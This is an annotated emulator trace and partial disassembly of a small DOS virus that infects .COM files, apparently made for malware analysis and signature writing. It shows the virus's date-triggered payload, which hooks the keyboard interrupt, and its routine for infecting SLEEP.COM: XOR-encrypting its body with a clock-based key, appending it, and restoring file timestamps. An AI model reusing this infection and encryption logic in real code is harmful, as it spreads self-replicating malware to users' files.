; The tracer prints a fixed window of instructions; the listing stops after 0x12aed.
; The next logged call in this run is at PC 12b2e and nothing is logged from 0x12add/0x12ae9,
; so this run presumably left through 0x12b0e (target not shown).
2018-12-25T11:50:20.047332778Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5  ; day of week == 5 (Friday)?
0x12ac1: jne 0x12b0e  ; not Friday -> skip the payload
0x12ac3: cmp dl, 0x19  ; day of month against 25
0x12ac6: jbe 0x12b0e  ; day <= 25 (unsigned) -> skip
0x12ac8: cmp cx, 0x7c8  ; year against 1992
0x12acc: jg 0x12ad3  ; year > 1992 -> payload, month is not checked
0x12ace: cmp dh, 0xb  ; year <= 1992: month against 11
0x12ad1: jb 0x12b0e  ; before November -> skip
; Payload path: reached only on a Friday after the 25th, in any year after 1992
; or in November/December of an earlier year.
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10  ; BIOS video AH=00h: set mode 3 (80x25 text)
0x12ad9: lea dx, word ptr [bp + 0x30f]  ; DX -> data at bp+0x30f; BP looks like the body's base register (assumption, its setup is not shown)
0x12add: mov ah, 9
0x12adf: int 0x21  ; DOS AH=09h: print the '$'-terminated string at DS:DX
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21  ; DOS AH=25h: repoint INT 09h (keyboard hardware interrupt) to DS:DX = bp+0x303; handler body not shown
0x12aeb: mov ah, 2
0x12aed: mov dx, 0  ; window ends here; the consumer of AH=2 / DX=0 is not shown
2018-12-25T11:50:20.050016824Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:20.052881072Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:20.053900917Z 25 PC: 12b39 | Get default drive
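2018-12-25T11:50:20.055700273Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]
2018-12-25T11:50:20.057884629Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]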
2018-12-25T11:50:20.058888837Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:20.06534471Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:20.070944211Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:21.025293313Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:21.031775831Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:21.034590447Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
; Builds the encrypted copy of the body, listed from the return address of the logged
; "Get time" call (op 44 = INT 21h AH=2Ch, which returns hundredths of a second in DL).
; Layout visible here: 0x35b (859) bytes copied, the first 0x17 (23) left in clear,
; the remaining 0x344 (836) XORed with a one-byte key. As far as this window shows,
; only the key byte at body offset 0x13 changes inside the clear prefix between infections,
; which makes that prefix the natural anchor for a static signature.
2018-12-25T11:50:21.062280172Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl  ; key = hundredths + 1
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl  ; store the key at bp+0x113, i.e. offset 0x13 of the body, before it is copied; presumably the decryptor's XOR operand (decryptor not shown)
0x12bfe: mov cx, 0x35b  ; 0x35b = 859, the size in the sample name and in the logged write
0x12c01: lea si, word ptr [bp + 0x100]  ; source: start of the body
0x12c05: mov di, 0xfc00  ; destination: buffer at ES:0xFC00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]  ; copy the whole body into the buffer
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17  ; skip the first 23 bytes of the copy
0x12c10: nop
0x12c11: mov di, si  ; read and write the same position: transform in place
0x12c13: mov cx, 0x344  ; 0x344 = 836 = 859 - 23 bytes to transform
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl  ; single-byte XOR with the clock-derived key
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx  ; reload BX from the top of the stack without consuming it; presumably the file handle
0x12c1e: mov al, 2
0x12c20: call 0x12c98  ; helper not shown; the next logged call is "Move file pointer" at PC 12ca0, so AL=2 is probably the seek origin (end of file)
2018-12-25T11:50:21.064445788Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.06662573Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:21.130479532Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.132633986Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:21.140415825Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:21.141859687Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:21.143059921Z 62 PC: 12c5f | Close file
2018-12-25T11:50:21.189287147Z 67 PC: 12c69 | Get or set file attributes
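2018-12-25T11:50:21.244089118Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]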
2018-12-25T11:50:21.245159847Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:21.249164454Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')